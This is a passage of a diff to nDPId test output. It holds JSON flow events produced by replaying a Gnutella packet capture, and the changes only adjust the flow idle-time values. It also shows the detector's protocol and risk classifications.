+00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":90742,"flow_last_seen":593652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9771,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490658,"flow_last_seen":490773,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":28681,"dst_port":16201,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490658,"flow_last_seen":490773,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":28681,"dst_port":16201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":131671,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.191.49.159","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":131671,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.191.49.159","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.68.138.207","src_port":50231,"dst_port":45079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.68.138.207","src_port":50231,"dst_port":45079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":50274,"dst_port":50679,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":50274,"dst_port":50679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.68.138.207","src_port":50231,"dst_port":45079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":68110,"flow_last_seen":77138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.68.138.207","src_port":50231,"dst_port":45079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":50274,"dst_port":50679,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"68.174.18.115","src_port":50274,"dst_port":50679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83520,"flow_last_seen":431830,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.30.86.144","src_port":28681,"dst_port":53821,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":83520,"flow_last_seen":431830,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.30.86.144","src_port":28681,"dst_port":53821,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490660,"flow_last_seen":490660,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":28681,"dst_port":9010,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3968,31 +3968,31 @@ 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490696,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.153.21.93","src_port":28681,"dst_port":36696,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490696,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.153.21.93","src_port":28681,"dst_port":36696,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":12513,"flow_last_seen":14765,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
-00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":365,"flow_first_seen":88704,"flow_last_seen":593692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":43484,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":365,"flow_first_seen":88704,"flow_last_seen":593692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":43484,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.65.217.224","src_port":28681,"dst_port":18381,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.65.217.224","src_port":28681,"dst_port":18381,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":490658,"flow_last_seen":548572,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":490658,"flow_last_seen":548572,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":487301,"flow_last_seen":490657,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00567{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":487301,"flow_last_seen":490657,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88705,"flow_last_seen":97732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88705,"flow_last_seen":97732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88705,"flow_last_seen":97732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88705,"flow_last_seen":97732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00783{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":431178,"flow_last_seen":599325,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":402,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":595449,"flow_last_seen":598465,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71541,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"5.180.62.100","src_port":28681,"dst_port":46385,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":71541,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"5.180.62.100","src_port":28681,"dst_port":46385,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69141,"flow_last_seen":78169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69141,"flow_last_seen":78169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75359,"flow_last_seen":84388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":50265,"dst_port":52647,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75359,"flow_last_seen":84388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":50265,"dst_port":52647,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69141,"flow_last_seen":78169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.163.14.246","src_port":50233,"dst_port":12854,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 